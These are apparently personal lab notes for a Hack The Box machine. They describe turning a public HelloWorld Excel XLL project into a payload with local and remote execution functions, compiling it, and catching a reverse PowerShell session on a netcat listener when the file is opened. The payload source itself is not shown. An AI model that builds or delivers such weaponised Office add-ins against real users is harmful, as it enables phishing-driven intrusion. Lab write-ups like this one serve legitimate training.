InfoSec LAB

Axlle_Payload

Created: 3 min read

XLL

While there are many ways to generate a XLL payload, I will be using one from edparcell, which appears to be really well written. It’s a C++ project.

According to the GitHub repo , Excel SDK is required for compilation along with some additional configurations

Excel 2013 SDK

I will download the Excel 2013 SDK from Microsoft

Going through the installation process

PS C:\> tree 'C:\2013 Office System Developer Resources\'
Folder PATH listing
Volume serial number is 00000082 BC6A:6165
C:\2013 OFFICE SYSTEM DEVELOPER RESOURCES
└───Excel2013XLLSDK
    ├───DOC
    ├───INCLUDE
    ├───LIB
    │   └───x64
    ├───SAMPLES
    │   ├───EXAMPLE
    │   ├───FRAMEWRK
    │   └───GENERIC
    └───SRC

Excel 2013 SDK is installed to the C:\2013 Office System Developer Resources directory

XLL Payload

PS C:\Users\admin\source\repos> git clone https://github.com/edparcell/HelloWorldXll ; start HelloWorldXll/HelloWorldXll.sln
Cloning into 'HelloWorldXll'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 15 (delta 0), reused 15 (delta 0), pack-reused 0
Receiving objects: 100% (15/15), 8.44 KiB | 4.22 MiB/s, done.

Downloading the repo, and starting up the solution file; HelloworldXll.sln

Now, I’m opening this solution in VS 2017, and it prompts me to retarget the projects. I won’t make any changes

There are 2 main source files; dllmain.cpp and HelloWorldXll.cpp

Opening up the project property, and set the Target Extension to .xll

I will then update the Additional Include Directories attribute to the installed Excel 2013 SDK

The Linker has to be updated as well. It needs to include the C:\2013 Office System Developer Resources\Excel2013XLLSDK\LIB\x64\XLCALL32.LIB file as an additional dependency

Now, it uses xlAutoOpen() function for code execution The PoC only opens a popup message with, “Hello world”. This must be changed

I first commented out the initial PoC part and created 2 functions; local_exec() for local testing and remote_exec for code execution on the target machine

Build complete The XLL file is available at C:\Users\admin\source\repos\HelloWorldXll\x64\Release\HelloWorldXll.xll

Local Testing

I transferred the newly compiled XLL payload to another Windows instance with Excel installed

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 4444
listening on [any] 4444 ...

and I have a Netcat listening on the port 4444

Double-clicking the XLL payload pops up a prompt on Excel

Enabling it

Excel hangs

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.1.1.2] from (UNKNOWN) [10.1.1.23] 50529
 
PS C:\Users\localUser\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : localdomain
   IPv4 Address. . . . . . . . . . . : 10.1.1.23
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.1.1.254
 
Ethernet adapter Bluetooth Network Connection:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

A session has been established. Local testing complete

To Kali

Now that I have confirmed the code execution from the local testing above, I will transfer the XLL payload to Kali

Transfer is made via SMB Delivery on standby

Interactive Graph View

Backlinks